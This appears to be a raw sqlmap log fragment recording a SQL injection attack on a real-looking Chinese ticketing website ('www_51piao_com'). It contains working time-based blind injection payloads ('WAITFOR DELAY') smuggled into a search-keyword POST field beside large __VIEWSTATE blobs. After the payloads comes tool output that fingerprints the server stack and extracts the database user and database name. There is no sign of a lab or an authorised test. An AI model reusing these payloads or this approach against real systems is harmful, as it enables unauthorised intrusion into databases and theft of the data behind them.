pPDA+O2k8MT47aTwyPjtpPDM+O2k8ND47PjtsPHQ8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g7VGl
ja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGlja2V0ZGF
5cz0mdGlja2V0cHJpY2U9MCwxMDAmbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcmljZTI9JmR
heTE9JmRheTI9OzEwMOWFg+S7peS4izs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g
7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGlja2V
0ZGF5cz0mdGlja2V0cHJpY2U9MTAxLDMwMCZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnByaWN
lMj0mZGF5MT0mZGF5Mj07MTAxLTMwMOWFgzs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWF
yY2g7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGl
ja2V0ZGF5cz0mdGlja2V0cHJpY2U9MzAxLDUwMCZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnB
yaWNlMj0mZGF5MT0mZGF5Mj07MzAxLTUwMOWFgzs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9
zZWFyY2g7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0
mdGlja2V0ZGF5cz0mdGlja2V0cHJpY2U9NTAxLDEwMDAmbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2U
xPSZwcmljZTI9JmRheTE9JmRheTI9OzUwMS0xMDAw5YWDOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA
8bm9uX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0mdGlja2V0dHl
wZWlkPSZ0aWNrZXRkYXlzPSZ0aWNrZXRwcmljZT0xMDAwJm5hbWU9MTImc3R5bGU9JnNvcnQ9JnByaWN
lMT0mcHJpY2UyPSZkYXkxPSZkYXkyPTsxMDAw5YWD5Lul5LiKOz47Oz47Pj47Pj47Pj47Pj47Pj47Pg=
=&TicketSearch1:KeyWord=12%'); WAITFOR DELAY '0:0:5'--&TicketSearch1:BtnSearchKe
y=%E6%90%9C%E7%B4%A2&TicketSearch1:Day1=&TicketSearch1:Day2=&TicketSearch1:Price
1=&TicketSearch1:Price2=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=dDwzOTI0MzMwMDQ7dDw7bDxpPDE+Oz47bDx0PDtsPGk8MD47PjtsPHQ
8O2w8aTwwPjtpPDE+O2k8ND47aTw1PjtpPDk+Oz47bDx0PHA8bDxfIUl0ZW1Db3VudDs+O2w8aTw5Pjs
+PjtsPGk8MD47aTwxPjtpPDI+O2k8Mz47aTw0PjtpPDU+O2k8Nj47aTw3PjtpPDg+Oz47bDx0PDtsPGk
8MD47PjtsPHQ8QDwxO+a8lOWUseS8mjs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDI76K+d5Ymn5q2
M5YmnOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8NTvoiJ7ouYjoiq3olb47Pjs7Pjs+Pjt0PDtsPGk
8MD47PjtsPHQ8QDwzO+mfs+S5kOS8mjs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDMwO+aIj+WJp+e
7vOiJujs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDQ4O+WEv+erpeS6suWtkDs+Ozs+Oz4+O3Q8O2w
8aTwwPjs+O2w8dDxAPDU3O+eUn+a0u+acjeWKoTs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDk755S
15b2x5L2T6IKyOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8NTM75p2C5oqA6a2U5pyvOz47Oz47Pj4
7Pj47dDxwPGw8XyFJdGVtQ291bnQ7PjtsPGk8NT47Pj47bDxpPDA+O2k8MT47aTwyPjtpPDM+O2k8ND4
7PjtsPHQ8O2w8aTwwPjs+O2w8dDxAPDE75LuK5aSpOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA8Mzv
kuInlpKnlhoU7Pjs7Pjs+Pjt0PDtsPGk8MD47PjtsPHQ8QDw3O+S4gOWRqOWGhTs+Ozs+Oz4+O3Q8O2w
8aTwwPjs+O2w8dDxAPDE0O+S6jOWRqOWGhTs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPDMwO+S4gOS
4quaciOWGhTs+Ozs+Oz4+Oz4+O3Q8cDxsPF8hSXRlbUNvdW50Oz47bDxpPDEwPjs+Pjs7Pjt0PHA8bDx
fIUl0ZW1Db3VudDs+O2w8aTwyPjs+PjtsPGk8MD47aTwxPjs+O2w8dDw7bDxpPDA+Oz47bDx0PEA8c2V
sX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0mdGlja2V0dHlwZWl
kPSZ0aWNrZXRkYXlzPSZ0aWNrZXRwcmljZT0mbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcml
jZTI9JmRheTE9JmRheTI9O+WMl+S6rDs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g
7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xNTcmdGlja2V0YWRkcmlkPSZ0aWNrZXR0eXBlaWQ9JnRpY2t
ldGRheXM9JnRpY2tldHByaWNlPSZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnByaWNlMj0mZGF
5MT0mZGF5Mj075LiK5rW3Oz47Oz47Pj47Pj47dDxwPGw8XyFJdGVtQ291bnQ7PjtsPGk8NT47Pj47bDx
pPDA+O2k8MT47aTwyPjtpPDM+O2k8ND47PjtsPHQ8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g7VGl
ja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGlja2V0ZGF
5cz0mdGlja2V0cHJpY2U9MCwxMDAmbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcmljZTI9JmR
heTE9JmRheTI9OzEwMOWFg+S7peS4izs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWFyY2g
7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGlja2V
0ZGF5cz0mdGlja2V0cHJpY2U9MTAxLDMwMCZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnByaWN
lMj0mZGF5MT0mZGF5Mj07MTAxLTMwMOWFgzs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9zZWF
yY2g7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0mdGl
ja2V0ZGF5cz0mdGlja2V0cHJpY2U9MzAxLDUwMCZuYW1lPTEyJnN0eWxlPSZzb3J0PSZwcmljZTE9JnB
yaWNlMj0mZGF5MT0mZGF5Mj07MzAxLTUwMOWFgzs+Ozs+Oz4+O3Q8O2w8aTwwPjs+O2w8dDxAPG5vbl9
zZWFyY2g7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9JnRpY2tldHR5cGVpZD0
mdGlja2V0ZGF5cz0mdGlja2V0cHJpY2U9NTAxLDEwMDAmbmFtZT0xMiZzdHlsZT0mc29ydD0mcHJpY2U
xPSZwcmljZTI9JmRheTE9JmRheTI9OzUwMS0xMDAw5YWDOz47Oz47Pj47dDw7bDxpPDA+Oz47bDx0PEA
8bm9uX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0mdGlja2V0dHl
wZWlkPSZ0aWNrZXRkYXlzPSZ0aWNrZXRwcmljZT0xMDAwJm5hbWU9MTImc3R5bGU9JnNvcnQ9JnByaWN
lMT0mcHJpY2UyPSZkYXkxPSZkYXkyPTsxMDAw5YWD5Lul5LiKOz47Oz47Pj47Pj47Pj47Pj47Pj47Pg=
=&TicketSearch1:KeyWord=12%') WAITFOR DELAY '0:0:5'--&TicketSearch1:BtnSearchKey
=%E6%90%9C%E7%B4%A2&TicketSearch1:Day1=&TicketSearch1:Day2=&TicketSearch1:Price1
=&TicketSearch1:Price2=
---
[14:29:32] [INFO] testing Microsoft SQL Server
[14:29:33] [INFO] confirming Microsoft SQL Server
[14:29:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[14:29:35] [INFO] fetching current user
current user:    'web61247'
[14:29:35] [INFO] fetching current database
current database:    'www_51piao_com'
[14:29:36] [INFO] testing if current user is DBA
current user is DBA:    False